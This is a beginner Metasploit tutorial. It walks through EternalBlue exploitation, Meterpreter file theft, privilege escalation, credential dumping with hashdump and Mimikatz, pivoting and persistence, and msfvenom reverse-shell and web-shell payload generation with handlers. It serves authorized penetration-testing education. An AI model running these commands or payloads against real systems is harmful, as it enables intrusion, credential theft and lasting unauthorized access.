Metasploit Tutorial for Beginners: Getting Started with Exploitation

Metasploit Framework is the world’s most used penetration testing tool. This beginner-friendly tutorial covers how to use Metasploit for vulnerability exploitation, payload generation, and post-exploitation during authorized security assessments.

What is Metasploit?

Metasploit is an open-source framework for developing, testing, and executing exploits. It includes a massive database of exploits, payloads, and auxiliary modules that simplify penetration testing.

Installing Metasploit

Kali Linux (Pre-installed)

Metasploit comes pre-installed on Kali Linux. Update it with:

sudo apt update && sudo apt install metasploit-framework

Other Linux Distributions

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall

Starting Metasploit

# Initialize the database (first time)
sudo msfdb init

# Start Metasploit console
msfconsole

# Start with quiet mode (no banner)
msfconsole -q

Basic Metasploit Commands

# Search for modules
search [keyword]
search type:exploit platform:windows smb
search cve:2017-0144

# Get help
help
help search

# Module information
info [module]

# Use a module
use [module]

# Show options
show options
show advanced

# Set options
set RHOSTS 192.168.1.100
set RPORT 445
setg RHOSTS 192.168.1.100  # Set globally

# Run the module
run
exploit

# Go back
back

# Exit
exit

Understanding Module Types

Exploits

Modules that take advantage of vulnerabilities to gain access:

use exploit/windows/smb/ms17_010_eternalblue
use exploit/multi/http/apache_mod_cgi_bash_env_exec

Payloads

Code that runs after successful exploitation:

# Show available payloads
show payloads

# Set a payload
set payload windows/x64/meterpreter/reverse_tcp
set payload linux/x86/meterpreter/reverse_tcp

# Common payload types:
# reverse_tcp - Target connects back to attacker
# bind_tcp - Attacker connects to target
# meterpreter - Advanced payload with many features

Auxiliary

Scanning, fuzzing, and other non-exploit modules:

use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/portscan/tcp

Post

Post-exploitation modules for after gaining access:

use post/windows/gather/hashdump
use post/linux/gather/enum_users_history
use post/multi/manage/shell_to_meterpreter

Practical Example: EternalBlue

Step-by-step exploitation of MS17-010 (EternalBlue):

# Start Metasploit
msfconsole -q

# Search for the exploit
search ms17-010

# Use the exploit
use exploit/windows/smb/ms17_010_eternalblue

# View options
show options

# Set target
set RHOSTS 192.168.1.100

# Set payload
set payload windows/x64/meterpreter/reverse_tcp

# Set listener IP (your IP)
set LHOST 192.168.1.50

# Run the exploit
exploit

# If successful, you will have a Meterpreter session

Meterpreter Commands

Meterpreter is Metasploit’s advanced payload with powerful features:

Basic Commands

# System info
sysinfo

# Get current user
getuid

# Get privileges
getprivs

# Process list
ps

# Get shell
shell

# Return to Meterpreter
exit

# Background session
background

# List sessions
sessions -l

# Interact with session
sessions -i 1

File System Commands

# Current directory
pwd

# List files
ls

# Change directory
cd C:\\Users

# Download file
download C:\\Users\\Admin\\Desktop\\secret.txt

# Upload file
upload /tmp/backdoor.exe C:\\Windows\\Temp\\

# Search for files
search -f *.txt
search -f password* -d C:\\Users

Privilege Escalation

# Attempt to get SYSTEM
getsystem

# Check current privileges
getprivs

# Bypass UAC
use exploit/windows/local/bypassuac
set SESSION 1
run

Credential Harvesting

# Dump hashes (requires SYSTEM)
hashdump

# Run Mimikatz
load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets

# Dump credentials from memory
run post/windows/gather/credentials/credential_collector

Lateral Movement

# Port forward
portfwd add -l 3389 -p 3389 -r 192.168.1.200

# Route through session
run autoroute -s 10.10.10.0/24

# Pivot scanning
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.10.0/24
run

Persistence

# Windows persistence (legacy Meterpreter script; newer versions use the module below)
run persistence -U -i 10 -p 4444 -r 192.168.1.50

# Using post modules
use exploit/windows/local/persistence
set SESSION 1
run

Generating Payloads with msfvenom

msfvenom creates standalone payloads for use outside Metasploit:

Common Payload Generation

# List payloads
msfvenom -l payloads

# List formats
msfvenom --list formats

# Windows executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe

# Linux ELF
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf

# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php

# Python payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py

# ASP payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp

# WAR file (Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war

Encoding Payloads

# List encoders
msfvenom -l encoders

# Encode the payload (iterate 5 times)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe

Encoders exist mainly to avoid bad characters in an exploit buffer; shikata_ga_nai output is heavily signatured, so encoding alone should not be expected to get past current antivirus.

Setting Up Handlers

To catch incoming connections from payloads:

# In msfconsole
use exploit/multi/handler

# Set payload (must match generated payload)
set payload windows/x64/meterpreter/reverse_tcp

# Set listener options
set LHOST 0.0.0.0
set LPORT 4444

# Run in background
exploit -j

# Run and interact immediately
exploit

Database Commands

# Check database connection
db_status

# Import Nmap scan
db_import /path/to/nmap_scan.xml

# View hosts
hosts

# View services
services
services -p 445

# View vulnerabilities
vulns

# Run Nmap from Metasploit
db_nmap -sV -sC 192.168.1.0/24
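What `db_import` does with an Nmap XML file, and what `hosts` and `services -p 445` then report, can be reproduced outside msfconsole. The following Python script is an added example, not part of the original tutorial or of Metasploit itself: it parses Nmap's `-oX` output, keeps only hosts that are up, and lists the addresses with a given port open, formatted as a `set RHOSTS` line. The XML document embedded in it is a constructed sample, not real scan output.

```python
"""Parse Nmap XML (-oX) output and list hosts/services the way msfconsole's
db_import + hosts / services -p <port> would after import.
Added example; SAMPLE_NMAP_XML below is constructed, not a real scan."""
import xml.etree.ElementTree as ET

# Constructed sample in Nmap's -oX format: two live hosts, one with SMB open.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.168.1.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.1.100" addrtype="ipv4"/>
    <hostnames><hostname name="win-host" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="open"/>
        <service name="ms-wbt-server"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.1.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="closed"/>
        <service name="microsoft-ds"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.1.102" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return a list of {"addr", "hostname", "services": [...]} for hosts that are up.
    Each service is {"port", "proto", "state", "name", "product"}."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts are not stored as live hosts
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        hn = host.find("hostnames/hostname")
        services = []
        for port in host.findall("ports/port"):
            state_el = port.find("state")
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
            services.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state_el.get("state") if state_el is not None else "unknown",
                "name": svc.get("name", "") if svc is not None else "",
                "product": product,
            })
        hosts.append({
            "addr": addr_el.get("addr"),
            "hostname": hn.get("name") if hn is not None else "",
            "services": services,
        })
    return hosts


def hosts_with_open_port(hosts, port, proto="tcp"):
    """Like `services -p <port>` restricted to open ports: sorted list of addresses."""
    return sorted(
        h["addr"] for h in hosts
        if any(s["port"] == port and s["proto"] == proto and s["state"] == "open"
               for s in h["services"])
    )


def rhosts_line(addrs):
    """Format addresses as a `set RHOSTS ...` line (RHOSTS accepts a space-separated list)."""
    return "set RHOSTS " + " ".join(addrs)


if __name__ == "__main__":
    live = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in live:
        print(h["addr"], h["hostname"] or "-",
              [f"{s['port']}/{s['proto']} {s['state']} {s['name']}" for s in h["services"]])
    print(rhosts_line(hosts_with_open_port(live, 445)))
```

Run it against a real `nmap -oX scan.xml ...` file by replacing `SAMPLE_NMAP_XML` with the file's contents; the same filtering is what you get from `db_import` followed by `services -p 445 -u` in msfconsole.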

Resource Scripts

Automate repetitive tasks with resource scripts:

# Create handler.rc
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit -j

# Run the script
msfconsole -r handler.rc

Tips for Effective Use

  1. Always enumerate first: Use Nmap and auxiliary scanners before exploitation
  2. Match payloads correctly: Ensure payload architecture matches target (x86 vs x64)
  3. Use staged payloads when size matters: a small stager connects back and loads the rest from the handler (staged payloads are named with a slash, e.g. meterpreter/reverse_tcp; stageless ones with an underscore, meterpreter_reverse_tcp)
  4. Check connectivity: Ensure your LHOST is reachable from the target and the handler's payload, LHOST and LPORT match what msfvenom was given
  5. Document everything: Use workspaces and notes for organization
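The "must match generated payload" requirement from the handler section and tips 2 and 4 above are easy to get wrong by hand. The script below is an added example (not code from the original tutorial or from Metasploit): it pulls the payload and KEY=VALUE options out of a msfvenom command line, reads the `set` lines of a handler resource script, and reports any payload, port, address or architecture mismatch before you start the listener. The msfvenom line and the handler.rc text inside it are constructed samples, and the handler sample deliberately uses the 32-bit stager so that the check has something to report; it assumes reverse-connect payloads, as all the examples on this page are.

```python
"""Consistency check between a msfvenom command and an exploit/multi/handler
resource script. Added example, not Metasploit code. The sample command and
handler.rc below are constructed; the handler's payload is intentionally the
x86 stager so the check finds a mismatch."""
import re
import shlex

SAMPLE_MSFVENOM = ("msfvenom -p windows/x64/meterpreter/reverse_tcp "
                   "LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe")

SAMPLE_HANDLER_RC = """use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit -j
"""


def parse_msfvenom(cmdline):
    """Extract the payload (-p/--payload) and KEY=VALUE options from a msfvenom command."""
    argv = shlex.split(cmdline)
    settings = {}
    i = 0
    while i < len(argv):
        tok = argv[i]
        if tok in ("-p", "--payload") and i + 1 < len(argv):
            settings["payload"] = argv[i + 1]
            i += 2
            continue
        m = re.fullmatch(r"([A-Za-z_]+)=(.*)", tok)
        if m:
            settings[m.group(1).upper()] = m.group(2)
        i += 1
    return settings


def parse_handler_rc(rc_text):
    """Extract payload/LHOST/LPORT from `set` or `setg` lines of a resource script."""
    settings = {}
    for line in rc_text.splitlines():
        line = line.split("#", 1)[0].strip()  # resource scripts allow # comments
        m = re.fullmatch(r"setg?\s+(\S+)\s+(.+)", line)
        if m:
            key, value = m.group(1), m.group(2).strip()
            settings["payload" if key.lower() == "payload" else key.upper()] = value
    return settings


def payload_arch(payload):
    """Infer architecture from the payload path: an /x64/ segment means 64-bit, else x86."""
    return "x64" if "/x64/" in payload else "x86"


def check_handler(venom, handler, target_arch=None, listener_bind="0.0.0.0"):
    """Return a list of mismatch descriptions; an empty list means the pair is consistent.
    Assumes reverse-connect payloads (the handler listens, the payload connects back)."""
    problems = []
    if venom.get("payload") != handler.get("payload"):
        problems.append(f"payload mismatch: msfvenom={venom.get('payload')} "
                        f"handler={handler.get('payload')}")
    if venom.get("LPORT") != handler.get("LPORT"):
        problems.append(f"LPORT mismatch: msfvenom={venom.get('LPORT')} "
                        f"handler={handler.get('LPORT')}")
    # A handler bound to 0.0.0.0 accepts the callback on any interface, so only a
    # concrete handler LHOST has to equal the address baked into the payload.
    h_lhost = handler.get("LHOST")
    if h_lhost not in (None, listener_bind) and h_lhost != venom.get("LHOST"):
        problems.append(f"LHOST mismatch: msfvenom={venom.get('LHOST')} handler={h_lhost}")
    if target_arch and venom.get("payload") and payload_arch(venom["payload"]) != target_arch:
        problems.append(f"architecture mismatch: payload is {payload_arch(venom['payload'])}, "
                        f"target is {target_arch}")
    return problems


if __name__ == "__main__":
    venom = parse_msfvenom(SAMPLE_MSFVENOM)
    handler = parse_handler_rc(SAMPLE_HANDLER_RC)
    for p in check_handler(venom, handler, target_arch="x86"):
        print("[-]", p)
```

On the constructed samples the check reports that the handler's `windows/meterpreter/reverse_tcp` does not match the generated `windows/x64/meterpreter/reverse_tcp`; a handler set to the wrong stager accepts the TCP connection but never completes the stage, which looks like a dead session rather than an obvious error.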

Summary

Metasploit is an essential tool for penetration testers. Start with basic scanning and exploitation, then progress to advanced Meterpreter usage and post-exploitation techniques. Always ensure you have proper authorization before using Metasploit against any target.

Written by Window Events